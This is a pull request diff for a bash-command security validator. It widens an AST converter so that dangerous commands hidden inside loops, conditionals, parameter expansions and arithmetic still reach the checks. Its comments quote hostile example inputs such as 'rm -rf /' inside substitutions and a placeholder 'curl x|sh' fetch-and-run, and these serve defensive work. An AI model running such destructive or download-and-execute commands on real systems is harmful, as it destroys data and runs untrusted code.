### PR TITLE
feat(parser): wire AstView into both walker families with parity gate (LAB-912)

### DIFF
--- a/src/schlock/core/ast_view.py
+++ b/src/schlock/core/ast_view.py
@@ -518,7 +518,7 @@ class _Converter:
         return [_node("ProcSubst", _pos(part), child=inner)]
 
     def _param_exp_words(self, part: dict) -> "list[AstView]":
-        """Words a `${…}` expansion EVALUATES, spliced in beside the parameter node.
+        """Structural children of the words a `${…}` expansion EVALUATES, spliced in beside the parameter node.
 
         `${z:-$(rm -rf /)}` runs that substitution; so do the replacement words of
         `${z/a/$(…)}`, the offsets of `${z:$(…):1}` and the subscript of
@@ -529,6 +529,14 @@ class _Converter:
         Siblings, not a `.parts` attribute on the parameter node: that is how
         `DblQuoted` already flattens its children, and bashlex's `parameter` node
         carries no `.parts` for a walker to find them under.
+
+        Spliced as the words' STRUCTURAL CHILDREN, not as `word` wrappers: a
+        generic `word` node whose span is quote-delimited becomes a quoted-literal
+        suppression range in `extract_string_literals`, so `echo ${z:-"rm -rf /"}`
+        would mask a rule match that the bashlex tier (childless `parameter`,
+        no range) still catches — the under-block direction (PR #137 review).
+        The wrappers still convert first, so an unmappable word (escapes, ANSI-C
+        quoting) keeps raising `UnmappedNodeError` → fallback tier.
 
         `Length`/`Excl`/`Short`/`Names` are bare flags with no word payload, and
         `Exp.Op` selects WHEN the word is evaluated (`:-` vs `:=` vs `:?`), never
@@ -546,7 +554,7 @@ class _Converter:
         for field in ("Offset", "Length"):
             words.extend(self._expr_words(substring.get(field)))
         words.extend(self._expr_words(part.get("Index")))
-        return words
+        return [child for word in words for child in word.parts]
 
     def convert_assign(self, assign: dict) -> AstView:
         if "Index" in assign or assign.get("Naked"):
@@ -648,7 +656,14 @@ def build_ast_view(command: str, typed_json: "Union[str, bytes, dict]") -> "list
         try:
             typed_json = json.loads(typed_json)
         except ValueError as exc:
-            raise NativeBridgeError(f"native parser emitted malformed JSON: {exc}")
+            raise NativeBridgeError(f"native parser emitted malformed JSON: {exc}") from exc
+        except RecursionError as exc:
+            # Older CPythons (3.9) blow the recursion limit inside the json
+            # decoder itself on a deeply nested AST, before the converter's own
+            # RecursionError guard below can fire. Same contract either way: a
+            # depth overflow anywhere in the bridge is a bridge failure that
+            # routes to the fallback tier, never a bare escape.
+            raise NativeBridgeError(f"native parser output too deeply nested to decode: {exc}") from exc
     if not isinstance(typed_json, dict) or typed_json.get("Type") != "File":
         got = f"Type={typed_json.get('Type')!r}" if isinstance(typed_json, dict) else type(typed_json).__name__
         raise UnmappedNodeError(f"expected a File root, got: {got}")

--- a/src/schlock/core/ast_view.py
+++ b/src/schlock/core/ast_view.py
@@ -23,13 +23,22 @@ Two rules carry the security weight:
    so a trailing `# comment` also trips this check; that over-conservatively
    routes commented commands to the bashlex tier, which parses them fine.
 
-Known T2b ceilings — ALL fail closed by raising into the fallback tier:
-backslash escapes in word text and non-ASCII input raise until T3 lands the
-per-WordPart unescape and byte→char offset conversion (passing raw escapes or
-byte offsets through would silently weaken the walkers' view — LAB-911 panel
-CRITs); constructs outside the 12-kind vocabulary — `if`/`for`/`while`/`case`,
-`[[ ]]`, arithmetic, arrays, negation, ANSI-C `$'…'` — raise until T2c widens
-the table.
+T2c widened the table to the constructs bashlex models as `compound` nodes
+(`if`/`for`/`while`/`case`/functions) plus the three it cannot parse at all
+(`[[ ]]`, `$(( ))`, array assignments), each pinned by a walker-output parity
+test in `tests/test_walker_parity.py`. Everything else stays unmapped, and two of
+those are deliberate rather than merely deferred: `!` negation and `(( ))` both
+LOOK trivially mappable, and mapping either measurably weakened the walkers —
+see `convert_stmt` and `_clause_expression` for the specific loosening each one
+caused. Widening is not free just because a construct parses.
+
+Known remaining ceilings — ALL fail closed by raising into the fallback tier:
+backslash escapes in word text, ANSI-C `$'…'` and non-ASCII input raise until T3
+lands the per-WordPart unescape and byte→char offset conversion (passing raw
+escapes or byte offsets through would silently weaken the walkers' view —
+LAB-911 panel CRITs); so do `!`, `coproc`, `(( ))`, indexed/naked assignments,
+redirects on a compound statement, and a trailing `# comment` (the CLI parses
+comments off, so the full-span assertion treats one as a prefix parse).
 """
 
 import json
@@ -74,6 +83,20 @@ MVDAN_NODE_MAP: "dict[str, tuple[str, Optional[str]]]" = {
     "Word": ("word", "parts"),
     "Assign": ("assignment", "parts"),
     "Redir": ("redirect", "output"),
+    # T2c: clause nodes with no bashlex kind of their own. bashlex models
+    # `if`/`for`/`while`/`case`/function bodies as a `compound` whose `.list`
+    # holds the branch statements (its `reservedword` tokens carry no danger and
+    # both walker families ignore them), and it cannot parse `[[ ]]`/`(( ))` at
+    # all. Reusing `compound` gives the walkers a shape they already traverse —
+    # `extract_command_segments` recurses `.list`, so a `rm -rf /` in a loop body
+    # surfaces as its own segment — without teaching them a 13th kind.
+    "IfClause": ("compound", "list"),
+    "WhileClause": ("compound", "list"),
+    "ForClause": ("compound", "list"),
+    "CaseClause": ("compound", "list"),
+    "FuncDecl": ("compound", "list"),
+    "TestClause": ("compound", "list"),
+    "ArithmExp": ("compound", "list"),
 }
 
 #: BinaryCmd numeric op → (operator text, container kind, separator kind).
@@ -122,7 +145,30 @@ WORD_PART_MAP: "dict[str, str]" = {
     "ParamExp": "source",
     "CmdSubst": "source",
     "ProcSubst": "source",
+    "ArithmExp": "source",
 }
+
+#: Test/arithmetic expression node → the operand fields to recurse into.
+#: `[[ … ]]` and `$(( … ))` cannot invoke a command; the only execution either
+#: carries is a word-level expansion (`$(…)`, backquotes, `${…}`), so the walkers
+#: need the operand WORDS and nothing else. The numeric comparison/arithmetic op
+#: is therefore deliberately NOT mapped — unlike a `BinaryCmd` op it selects a
+#: comparison, never a command, so dropping it cannot shrink the danger surface.
+#: An unlisted expression type still raises: a future mvdan node that DOES
+#: introduce execution must not slip through as "just another operand".
+EXPR_OPERANDS: "dict[str, tuple[str, ...]]" = {
+    "Word": (),
+    "UnaryTest": ("X",),
+    "BinaryTest": ("X", "Y"),
+    "ParenTest": ("X",),
+    "UnaryArithm": ("X",),
+    "BinaryArithm": ("X", "Y"),
+    "ParenArithm": ("X",),
+}
+
+#: ForClause loop header → where its words live. `for x in a b` carries Words;
+#: `for ((i=0; i<n; i++))` carries three arithmetic expressions instead.
+FOR_LOOP_KINDS: "dict[str, str]" = {"WordIter": "items", "CStyleLoop": "arithmetic"}
 
 #: WordPart types that also materialize as structural children in a word's
 #: `.parts` (bashlex nests these so walkers can find substitutions in words).
@@ -231,7 +277,17 @@ class _Converter:
             return group[0][0]
         parts: list[AstView] = []
         for node, operator in group:
-            parts.append(node)
+            if node.kind == "list":
+                # bashlex emits ONE FLAT list for `a; b && c` — [a, ;, b, &&, c] —
+                # where mvdan nests the `&&` as its own BinaryCmd. Splice
+                # same-kind children so substitution.py's topology checks see the
+                # shape they were written against: a nested `list` in a segment
+                # slot renders to None and blocks a legitimate `$(pwd; ls && ls)`.
+                # (Only `list` flattens — bashlex keeps a `pipeline` nested, which
+                # `_binary_side` already mirrors for same-kind chains.)
+                parts.extend(node.parts)
+            else:
+                parts.append(node)
             if operator is not None:
                 parts.append(operator)
         return _node("File", (parts[0].pos[0], parts[-1].pos[1]), child=parts)
@@ -248,7 +304,17 @@ class _Converter:
     def convert_stmt(self, stmt: dict) -> AstView:
         for modifier in ("Negated", "Coprocess"):
             if stmt.get(modifier):
-                # Dropping `!`/`coproc` would silently change what executes.
+                # `coproc` runs the command behind its own pipes — a shape
+                # bashlex has no node for.
+                #
+                # `!` looks harmless (it only inverts the exit status) and T2c
+                # trialled mapping it, but the parity sweep caught a REAL
+                # loosening: `substitution.py:_is_valid_pipeline_topology`
+                # deliberately fails closed on `$(! a | b)` because bashlex's
+                # leading `reservedword` makes the parts count even. Dropping the
+                # `!` hands that check a clean pipeline and it ALLOWS what bashlex
+                # BLOCKED. Negation is not one of the 7 bashlex-failing
+                # constructs, so the fallback tier costs nothing here.
                 raise UnmappedNodeError(f"unmapped statement modifier: {modifier}")
         cmd = stmt.get("Cmd")
         if cmd is None:
@@ -263,14 +329,17 @@ class _Converter:
     # -- commands -----------------------------------------------------------
 
     def convert_command(self, cmd: dict, redirects: "list[AstView]") -> AstView:
-        node_type = cmd.get("Type")
+        node_type = cmd.get("Type") or ""
         if node_type == "CallExpr":
             return self._convert_call(cmd, redirects)
         if node_type == "BinaryCmd":
             return self._convert_binary(cmd)
         if node_type in ("Subshell", "Block"):
             return _node(node_type, _pos(cmd), child=self.stmts_to_nodes(cmd.get("Stmts", [])))
-        raise UnmappedNodeError(f"unmapped typed-JSON node type: {node_type}")
+        clause = _CLAUSE_CHILDREN.get(node_type)
+        if clause is None:
+            raise UnmappedNodeError(f"unmapped typed-JSON node type: {node_type}")
+        return _node(node_type, _pos(cmd), child=clause(self, cmd))
 
     def _convert_call(self, cmd: dict, redirects: "list[AstView]") -> AstView:
         parts = [self.convert_assign(a) for a in cmd.get("Assigns", [])]
@@ -317,6 +386,80 @@ class _Converter:
             if inner_op is not None and inner_op[1] == container_kind:
                 return self._convert_binary(inner_cmd).parts
         return [self.convert_stmt(stmt)]
+
+    # -- clauses (T2c) ------------------------------------------------------
+    # Each returns the children of a `compound` node's `.list`. Every branch of
+    # a clause contributes: an `if` whose ELSE arm holds the `rm -rf /` is the
+    # obvious under-block, but so is a `case` whose non-matching arm does — the
+    # walkers validate every reachable command, not the one that happens to run.
+
+    def _clause_if(self, cmd: dict) -> "list[AstView]":
+        children = self.stmts_to_nodes(cmd.get("Cond", []))
+        children.extend(self.stmts_to_nodes(cmd.get("Then", [])))
+        else_clause = cmd.get("Else")
+        if else_clause is not None:
+            # typedjson leaves `Else` untagged because it is a concrete *IfClause
+            # field, not an interface: an `elif` arm carries Cond+Then, a bare
+            # `else` carries Then only. Recursing handles both.
+            children.extend(self._clause_if(else_clause))
+        return children
+
+    def _clause_while(self, cmd: dict) -> "list[AstView]":
+        # `until` is the same node with Until=true; inverting the loop's exit
+        # test does not change which commands run.
+        children = self.stmts_to_nodes(cmd.get("Cond", []))
+        children.extend(self.stmts_to_nodes(cmd.get("Do", [])))
+        return children
+
+    def _clause_for(self, cmd: dict) -> "list[AstView]":
+        loop = cmd.get("Loop") or {}
+        loop_kind = FOR_LOOP_KINDS.get(loop.get("Type", ""))
+        if loop_kind is None:
+            raise UnmappedNodeError(f"unmapped for-loop header: {loop.get('Type')}")
+        if loop_kind == "items":
+            children = [self.convert_word(w) for w in loop.get("Items", [])]
+        else:
+            children = [w for field in ("Init", "Cond", "Post") for w in self._expr_words(loop.get(field))]
+        children.extend(self.stmts_to_nodes(cmd.get("Do", [])))
+        return children
+
+    def _clause_case(self, cmd: dict) -> "list[AstView]":
+        children = [self.convert_word(cmd["Word"])]
+        for item in cmd.get("Items", []):
+            children.extend(self.convert_word(p) for p in item.get("Patterns", []))
+            children.extend(self.stmts_to_nodes(item.get("Stmts", [])))
+        return children
+
+    def _clause_func(self, cmd: dict) -> "list[AstView]":
+        body = cmd.get("Body")
+        if body is None:
+            raise UnmappedNodeError("function declaration without a body is not mapped")
+        return [self.convert_stmt(body)]
+
+    def _clause_expression(self, cmd: dict) -> "list[AstView]":
+        """`[[ … ]]` / `$(( … ))` — one expression tree, operand words only.
+
+        `ArithmCmd` (`(( x++ ))`) is deliberately NOT routed here and keeps
+        raising. bashlex does parse it, but misreads the arithmetic body as a
+        COMMAND whose name is the whole expression (`x++`), so a mapping would
+        have to reproduce that misparse verbatim just to stay a superset of it —
+        encoding a known-wrong model in the table to satisfy a gate. It is not
+        one of the 7 bashlex-failing constructs, so the fallback tier already
+        covers it at no loss; T3's differential oracle is where to revisit.
+        """
+        return self._expr_words(cmd.get("X"))
+
+    def _expr_words(self, expr: "Optional[dict]") -> "list[AstView]":
+        """Collect the operand words of a test/arithmetic expression tree."""
+        if not expr:
+            return []
+        expr_type = expr.get("Type", "")
+        operands = EXPR_OPERANDS.get(expr_type)
+        if operands is None:
+            raise UnmappedNodeError(f"unmapped test/arithmetic expression node: {expr_type}")
+        if expr_type == "Word":
+            return [self.convert_word(expr)]
+        return [word for field in operands for word in self._expr_words(expr.get(field))]
 
     # -- words, assignments, redirects, word parts --------------------------
 
@@ -373,6 +516,10 @@ class _Converter:
         if part_type == "CmdSubst":
             inner = self.stmts_to_single_node(part.get("Stmts", []), "command substitution")
             return [_node("CmdSubst", _pos(part), child=inner)]
+        if part_type == "ArithmExp":
+            # `$(( $(rm -rf /) + 1 ))` executes inside the arithmetic; the
+            # operand words carry that substitution to SubstitutionValidator.
+            return [_node("ArithmExp", _pos(part), child=self._expr_words(part.get("X")))]
         # ProcSubst
         if part.get("Op") not in PROC_SUBST_OPS:
             raise UnmappedNodeError(f"unmapped ProcSubst op code: {part.get('Op')}")
@@ -380,11 +527,13 @@ class _Converter:
         return [_node("ProcSubst", _pos(part), child=inner)]
 
     def convert_assign(self, assign: dict) -> AstView:
-        if "Array" in assign or "Index" in assign or assign.get("Naked"):
-            # a=(1 2 3) and friends are among T2c's 7 newly-parseable
-            # constructs; their bashlex-equivalent shape is pinned there.
-            raise UnmappedNodeError("array/indexed/naked assignment is not mapped yet")
+        if "Index" in assign or assign.get("Naked"):
+            # `a[$(rm -rf /)]=x` and `declare -x foo` need shapes no walker has
+            # been shown yet; they stay fail-closed until a test pins them.
+            raise UnmappedNodeError("indexed/naked assignment is not mapped yet")
         operator = "+=" if assign.get("Append") else "="
+        if "Array" in assign:
+            return self._convert_array_assign(assign, operator)
         value = assign.get("Value")
         if value is None:
             value_text, children = "", []
@@ -392,6 +541,23 @@ class _Converter:
             value_text, children = self._word_content(value)
         word = assign["Name"]["Value"] + operator + value_text
         return _node("Assign", _pos(assign), child=children, word=word)
+
+    def _convert_array_assign(self, assign: dict, operator: str) -> AstView:
+        """`a=(1 2 3)` — bashlex cannot parse this, so there is no shape to match.
+
+        `.word` keeps the SOURCE spelling of the array (the rule engine matches
+        on text, and `a=($(curl x|sh))` must stay recognizable), while every
+        element's word node hangs off `.parts` so a substitution inside an
+        element still reaches SubstitutionValidator.
+        """
+        array = assign["Array"]
+        elements: list[AstView] = []
+        for elem in array.get("Elems", []):
+            elements.extend(self._expr_words(elem.get("Index")))  # a=([i+1]=x)
+            if elem.get("Value"):
+                elements.append(self.convert_word(elem["Value"]))
+        word = assign["Name"]["Value"] + operator + self._slice(*_pos(array))
+        return _node("Assign", _pos(assign), child=elements, word=word)
 
     def convert_redirect(self, redir: dict) -> AstView:
         op_code = redir["Op"]
@@ -422,6 +588,19 @@ class _Converter:
             # slice reproduces that exactly (mvdan's End already covers it).
             attrs["heredoc"] = AstView("heredoc", hdoc_pos, value=self._slice(*hdoc_pos))
         return _node("Redir", _pos(redir), child=output, **attrs)
+
+
+#: Clause node type → the `_Converter` method producing its `compound.list`.
+#: A table, not an if-chain, for the same reason MVDAN_NODE_MAP is: dispatch and
+#: the kind contract stay in one place, and a type absent here RAISES.
+_CLAUSE_CHILDREN = {
+    "IfClause": _Converter._clause_if,
+    "WhileClause": _Converter._clause_while,
+    "ForClause": _Converter._clause_for,
+    "CaseClause": _Converter._clause_case,
+    "FuncDecl": _Converter._clause_func,
+    "TestClause": _Converter._clause_expression,
+}
 
 
 def build_ast_view(command: str, typed_json: "Union[str, bytes, dict]") -> "list[AstView]":

--- a/src/schlock/core/ast_view.py
+++ b/src/schlock/core/ast_view.py
@@ -24,21 +24,19 @@ Two rules carry the security weight:
    routes commented commands to the bashlex tier, which parses them fine.
 
 T2c widened the table to the constructs bashlex models as `compound` nodes
-(`if`/`for`/`while`/`case`/functions) plus the three it cannot parse at all
-(`[[ ]]`, `$(( ))`, array assignments), each pinned by a walker-output parity
-test in `tests/test_walker_parity.py`. Everything else stays unmapped, and two of
-those are deliberate rather than merely deferred: `!` negation and `(( ))` both
-LOOK trivially mappable, and mapping either measurably weakened the walkers —
-see `convert_stmt` and `_clause_expression` for the specific loosening each one
-caused. Widening is not free just because a construct parses.
+(`if`/`for`/`while`/`select`/`case`/functions) plus the three it cannot parse at
+all (`[[ ]]`, `$(( ))`, array assignments), each pinned by a walker-output parity
+test in `tests/test_walker_parity.py`. Widening is NOT free just because a
+construct parses: `!` and `(( ))` both look trivially mappable and both
+measurably weakened the walkers when tried — the reason lives at each raise site
+(`convert_stmt`, `_clause_test`), which is where the next person will look.
 
-Known remaining ceilings — ALL fail closed by raising into the fallback tier:
-backslash escapes in word text, ANSI-C `$'…'` and non-ASCII input raise until T3
-lands the per-WordPart unescape and byte→char offset conversion (passing raw
-escapes or byte offsets through would silently weaken the walkers' view —
-LAB-911 panel CRITs); so do `!`, `coproc`, `(( ))`, indexed/naked assignments,
-redirects on a compound statement, and a trailing `# comment` (the CLI parses
-comments off, so the full-span assertion treats one as a prefix parse).
+Remaining ceilings, ALL fail-closed by raising into the fallback tier: backslash
+escapes in word text, ANSI-C `$'…'` and non-ASCII input (T3 owns the per-WordPart
+unescape and byte→char conversion — passing raw escapes or byte offsets through
+would silently weaken the walkers, LAB-911 panel CRITs); plus `!`, `coproc`,
+`(( ))`, indexed/naked assignments, redirects on a compound statement, and a
+trailing `# comment` (comments are parsed off, so one reads as a prefix parse).
 """
 
 import json
@@ -83,19 +81,20 @@ MVDAN_NODE_MAP: "dict[str, tuple[str, Optional[str]]]" = {
     "Word": ("word", "parts"),
     "Assign": ("assignment", "parts"),
     "Redir": ("redirect", "output"),
-    # T2c: clause nodes with no bashlex kind of their own. bashlex models
-    # `if`/`for`/`while`/`case`/function bodies as a `compound` whose `.list`
-    # holds the branch statements (its `reservedword` tokens carry no danger and
-    # both walker families ignore them), and it cannot parse `[[ ]]`/`(( ))` at
-    # all. Reusing `compound` gives the walkers a shape they already traverse —
-    # `extract_command_segments` recurses `.list`, so a `rm -rf /` in a loop body
-    # surfaces as its own segment — without teaching them a 13th kind.
+    # T2c clauses, all reusing `compound` because that is what bashlex models
+    # `if`/`for`/`while`/`case`/function bodies as (its `reservedword` tokens
+    # carry no danger and both walker families skip them), and because
+    # `extract_command_segments` already recurses `.list` — so a `rm -rf /` in a
+    # loop body surfaces as its own segment without a 13th kind. Handlers for
+    # these live in _CLAUSE_CHILDREN.
     "IfClause": ("compound", "list"),
     "WhileClause": ("compound", "list"),
     "ForClause": ("compound", "list"),
     "CaseClause": ("compound", "list"),
     "FuncDecl": ("compound", "list"),
     "TestClause": ("compound", "list"),
+    # Not a clause: `$(( … ))` is a WordPart whose children are its operand
+    # words (see _word_part_children), and it borrows the same `compound` shape.
     "ArithmExp": ("compound", "list"),
 }
 
@@ -148,7 +147,8 @@ WORD_PART_MAP: "dict[str, str]" = {
     "ArithmExp": "source",
 }
 
-#: Test/arithmetic expression node → the operand fields to recurse into.
+#: Test/arithmetic expression node → the operand fields to recurse into (`Word`
+#: is the leaf and is handled before this lookup, so no entry may be empty).
 #: `[[ … ]]` and `$(( … ))` cannot invoke a command; the only execution either
 #: carries is a word-level expansion (`$(…)`, backquotes, `${…}`), so the walkers
 #: need the operand WORDS and nothing else. The numeric comparison/arithmetic op
@@ -157,7 +157,6 @@ WORD_PART_MAP: "dict[str, str]" = {
 #: An unlisted expression type still raises: a future mvdan node that DOES
 #: introduce execution must not slip through as "just another operand".
 EXPR_OPERANDS: "dict[str, tuple[str, ...]]" = {
-    "Word": (),
     "UnaryTest": ("X",),
     "BinaryTest": ("X", "Y"),
     "ParenTest": ("X",),
@@ -165,10 +164,6 @@ EXPR_OPERANDS: "dict[str, tuple[str, ...]]" = {
     "BinaryArithm": ("X", "Y"),
     "ParenArithm": ("X",),
 }
-
-#: ForClause loop header → where its words live. `for x in a b` carries Words;
-#: `for ((i=0; i<n; i++))` carries three arithmetic expressions instead.
-FOR_LOOP_KINDS: "dict[str, str]" = {"WordIter": "items", "CStyleLoop": "arithmetic"}
 
 #: WordPart types that also materialize as structural children in a word's
 #: `.parts` (bashlex nests these so walkers can find substitutions in words).
@@ -279,12 +274,11 @@ class _Converter:
         for node, operator in group:
             if node.kind == "list":
                 # bashlex emits ONE FLAT list for `a; b && c` — [a, ;, b, &&, c] —
-                # where mvdan nests the `&&` as its own BinaryCmd. Splice
-                # same-kind children so substitution.py's topology checks see the
-                # shape they were written against: a nested `list` in a segment
-                # slot renders to None and blocks a legitimate `$(pwd; ls && ls)`.
-                # (Only `list` flattens — bashlex keeps a `pipeline` nested, which
-                # `_binary_side` already mirrors for same-kind chains.)
+                # where mvdan nests the `&&`. Splice same-kind children so
+                # substitution.py's topology checks see the alternation they were
+                # written against; a nested `list` in a segment slot renders to
+                # None and falsely blocks `$(pwd; ls && ls)`. Only `list`
+                # flattens — bashlex keeps a `pipeline` nested.
                 parts.extend(node.parts)
             else:
                 parts.append(node)
@@ -302,20 +296,20 @@ class _Converter:
         return nodes[0]
 
     def convert_stmt(self, stmt: dict) -> AstView:
-        for modifier in ("Negated", "Coprocess"):
-            if stmt.get(modifier):
-                # `coproc` runs the command behind its own pipes — a shape
-                # bashlex has no node for.
-                #
-                # `!` looks harmless (it only inverts the exit status) and T2c
-                # trialled mapping it, but the parity sweep caught a REAL
-                # loosening: `substitution.py:_is_valid_pipeline_topology`
-                # deliberately fails closed on `$(! a | b)` because bashlex's
-                # leading `reservedword` makes the parts count even. Dropping the
-                # `!` hands that check a clean pipeline and it ALLOWS what bashlex
-                # BLOCKED. Negation is not one of the 7 bashlex-failing
-                # constructs, so the fallback tier costs nothing here.
-                raise UnmappedNodeError(f"unmapped statement modifier: {modifier}")
+        if stmt.get("Negated"):
+            # `!` looks harmless — it only inverts the exit status — and T2c
+            # trialled mapping it, but the parity sweep caught a real loosening:
+            # substitution.py's `_is_valid_pipeline_topology` deliberately fails
+            # closed on `$(! a | b)` because bashlex's leading `reservedword`
+            # makes the parts count even. Dropping the `!` hands that check a
+            # clean pipeline of whitelisted readers and it ALLOWS what bashlex
+            # BLOCKED. Not one of the 7 bashlex-failing constructs, so the
+            # fallback tier covers it at no loss.
+            #
+            # (`coproc` is unmapped too, but it arrives as a `CoprocClause`
+            # command and raises from the clause table — `Stmt.Coprocess` is the
+            # mksh `|&` spelling, which this bash-mode CLI never emits.)
+            raise UnmappedNodeError("unmapped statement modifier: Negated")
         cmd = stmt.get("Cmd")
         if cmd is None:
             raise UnmappedNodeError("statement without a command has no mapped shape")
@@ -413,13 +407,13 @@ class _Converter:
 
     def _clause_for(self, cmd: dict) -> "list[AstView]":
         loop = cmd.get("Loop") or {}
-        loop_kind = FOR_LOOP_KINDS.get(loop.get("Type", ""))
-        if loop_kind is None:
-            raise UnmappedNodeError(f"unmapped for-loop header: {loop.get('Type')}")
-        if loop_kind == "items":
+        loop_type = loop.get("Type")
+        if loop_type == "WordIter":  # for x in a b — and `select`, same node
             children = [self.convert_word(w) for w in loop.get("Items", [])]
-        else:
+        elif loop_type == "CStyleLoop":  # for ((i=$(…); i<n; i++))
             children = [w for field in ("Init", "Cond", "Post") for w in self._expr_words(loop.get(field))]
+        else:
+            raise UnmappedNodeError(f"unmapped for-loop header: {loop_type}")
         children.extend(self.stmts_to_nodes(cmd.get("Do", [])))
         return children
 
@@ -431,21 +425,18 @@ class _Converter:
         return children
 
     def _clause_func(self, cmd: dict) -> "list[AstView]":
-        body = cmd.get("Body")
-        if body is None:
-            raise UnmappedNodeError("function declaration without a body is not mapped")
-        return [self.convert_stmt(body)]
+        return [self.convert_stmt(cmd["Body"])]
 
-    def _clause_expression(self, cmd: dict) -> "list[AstView]":
-        """`[[ … ]]` / `$(( … ))` — one expression tree, operand words only.
+    def _clause_test(self, cmd: dict) -> "list[AstView]":
+        """`[[ … ]]` — one test-expression tree, operand words only.
 
         `ArithmCmd` (`(( x++ ))`) is deliberately NOT routed here and keeps
-        raising. bashlex does parse it, but misreads the arithmetic body as a
-        COMMAND whose name is the whole expression (`x++`), so a mapping would
-        have to reproduce that misparse verbatim just to stay a superset of it —
-        encoding a known-wrong model in the table to satisfy a gate. It is not
-        one of the 7 bashlex-failing constructs, so the fallback tier already
-        covers it at no loss; T3's differential oracle is where to revisit.
+        raising: bashlex does parse it, but misreads the arithmetic body as a
+        COMMAND named after the whole expression (`x++`), so a mapping would have
+        to copy that misparse just to stay a superset of it. Not one of the 7
+        bashlex-failing constructs, so the fallback tier covers it at no loss.
+        (`$(( … ))` is an ArithmExp WORD PART, not a clause — see
+        `_word_part_children`.)
         """
         return self._expr_words(cmd.get("X"))
 
@@ -454,11 +445,11 @@ class _Converter:
         if not expr:
             return []
         expr_type = expr.get("Type", "")
+        if expr_type == "Word":  # the leaf; checked first so no table row is empty
+            return [self.convert_word(expr)]
         operands = EXPR_OPERANDS.get(expr_type)
         if operands is None:
             raise UnmappedNodeError(f"unmapped test/arithmetic expression node: {expr_type}")
-        if expr_type == "Word":
-            return [self.convert_word(expr)]
         return [word for field in operands for word in self._expr_words(expr.get(field))]
 
     # -- words, assignments, redirects, word parts --------------------------
@@ -512,7 +503,7 @@ class _Converter:
         if part_type not in _STRUCTURAL_WORD_PARTS:
             return []
         if part_type == "ParamExp":
-            return [_node("ParamExp", _pos(part), value=part["Param"]["Value"])]
+            return [_node("ParamExp", _pos(part), value=part["Param"]["Value"]), *self._param_exp_words(part)]
         if part_type == "CmdSubst":
             inner = self.stmts_to_single_node(part.get("Stmts", []), "command substitution")
             return [_node("CmdSubst", _pos(part), child=inner)]
@@ -525,6 +516,37 @@ class _Converter:
             raise UnmappedNodeError(f"unmapped ProcSubst op code: {part.get('Op')}")
         inner = self.stmts_to_single_node(part.get("Stmts", []), "process substitution")
         return [_node("ProcSubst", _pos(part), child=inner)]
+
+    def _param_exp_words(self, part: dict) -> "list[AstView]":
+        """Words a `${…}` expansion EVALUATES, spliced in beside the parameter node.
+
+        `${z:-$(rm -rf /)}` runs that substitution; so do the replacement words of
+        `${z/a/$(…)}`, the offsets of `${z:$(…):1}` and the subscript of
+        `${a[$(…)]}`. A childless `parameter` node hid all four from
+        SubstitutionValidator — invisible on the bashlex tier too, which sees none
+        of them, so mapping them is a superset rather than parity (LAB-912 panel).
+
+        Siblings, not a `.parts` attribute on the parameter node: that is how
+        `DblQuoted` already flattens its children, and bashlex's `parameter` node
+        carries no `.parts` for a walker to find them under.
+
+        `Length`/`Excl`/`Short`/`Names` are bare flags with no word payload, and
+        `Exp.Op` selects WHEN the word is evaluated (`:-` vs `:=` vs `:?`), never
+        what runs — so neither can shrink the danger surface by going unmapped.
+        """
+        words: list[AstView] = []
+        expansion = part.get("Exp") or {}
+        if expansion.get("Word"):
+            words.append(self.convert_word(expansion["Word"]))
+        replacement = part.get("Repl") or {}
+        for field in ("Orig", "With"):
+            if replacement.get(field):
+                words.append(self.convert_word(replacement[field]))
+        substring = part.get("Slice") or {}
+        for field in ("Offset", "Length"):
+            words.extend(self._expr_words(substring.get(field)))
+        words.extend(self._expr_words(part.get("Index")))
+        return words
 
     def convert_assign(self, assign: dict) -> AstView:
         if "Index" in assign or assign.get("Naked"):
@@ -591,15 +613,17 @@ class _Converter:
 
 
 #: Clause node type → the `_Converter` method producing its `compound.list`.
-#: A table, not an if-chain, for the same reason MVDAN_NODE_MAP is: dispatch and
-#: the kind contract stay in one place, and a type absent here RAISES.
+#: A table, not an if-chain, so a type absent here RAISES. Its keys must all
+#: carry a `("compound", "list")` row in MVDAN_NODE_MAP — the two would otherwise
+#: drift into a KeyError that blames the binary for a table bug, so
+#: `test_ast_view.py` pins them together.
 _CLAUSE_CHILDREN = {
     "IfClause": _Converter._clause_if,
     "WhileClause": _Converter._clause_while,
     "ForClause": _Converter._clause_for,
     "CaseClause": _Converter._clause_case,
     "FuncDecl": _Converter._clause_func,
-    "TestClause": _Converter._clause_expression,
+    "TestClause": _Converter._clause_test,
 }
 
 
@@ -651,9 +675,12 @@ def build_ast_view(command: str, typed_json: "Union[str, bytes, dict]") -> "list
         return _Converter(command).stmts_to_nodes(stmts)
     except NativeBridgeError:
         raise
-    except (KeyError, TypeError, AttributeError, IndexError, UnicodeDecodeError) as exc:
+    except (KeyError, TypeError, AttributeError, IndexError, UnicodeDecodeError, RecursionError) as exc:
         # Structural drift in the typed-JSON (a field the binary stopped
         # emitting) must reach T5's router as a NativeBridgeError → bashlex
         # tier, not escape as a bare KeyError that hard-DENIES with no
-        # context (panel MAJ, LAB-911 review).
+        # context (panel MAJ, LAB-911 review). RecursionError joins them for the
+        # same reason: deeply nested clauses (`if …; then` × 300) blow the Python
+        # stack in the converter while bashlex parses them, so it is a bridge
+        # failure to route, not a verdict (LAB-912 panel).
         raise NativeBridgeError(f"malformed typed-JSON structure: {exc!r}") from exc

--- a/src/schlock/core/parser.py
+++ b/src/schlock/core/parser.py
@@ -473,13 +473,7 @@ class BashCommandParser:
         return results
 
     def _segment_nodes(self, ast_nodes: list[Any]) -> list[Any]:
-        """Collect the AST nodes that each form one independently-validated segment.
-
-        Shared by extract_command_segments and extract_command_segments_with_literals
-        so both see the same set of segments; a traversal that drifted between the
-        two would validate one set of segments against another set's string
-        literals, silently suppressing rule matches.
-        """
+        """Collect the AST nodes that each form one independently-validated segment."""
         nodes: list[Any] = []
 
         def visit(node):  # noqa: PLR0912 - AST traversal requires multiple branches
@@ -560,31 +554,29 @@ class BashCommandParser:
             >>> parser.extract_command_segments("ls | rm -rf / && echo done", ast)
             ['ls', 'rm -rf /', 'echo done']
         """
-        segments = []
-        for node in self._segment_nodes(ast_nodes):
-            located = self._locate_segment(command, node)
-            if located is not None:
-                segments.append(located[0])
-        return segments
+        return [text for text, _literals in self.extract_command_segments_with_literals(command, ast_nodes)]
 
     def extract_command_segments_with_literals(self, command: str, ast_nodes: list[Any]) -> list[tuple[str, list[tuple]]]:
         """Segments plus their quoted-string ranges, derived from ONE parse.
 
         PERF/SECURITY: the segment loop in `validate_command` used to re-parse
         every segment just to recover its string-literal ranges — N+1 parses per
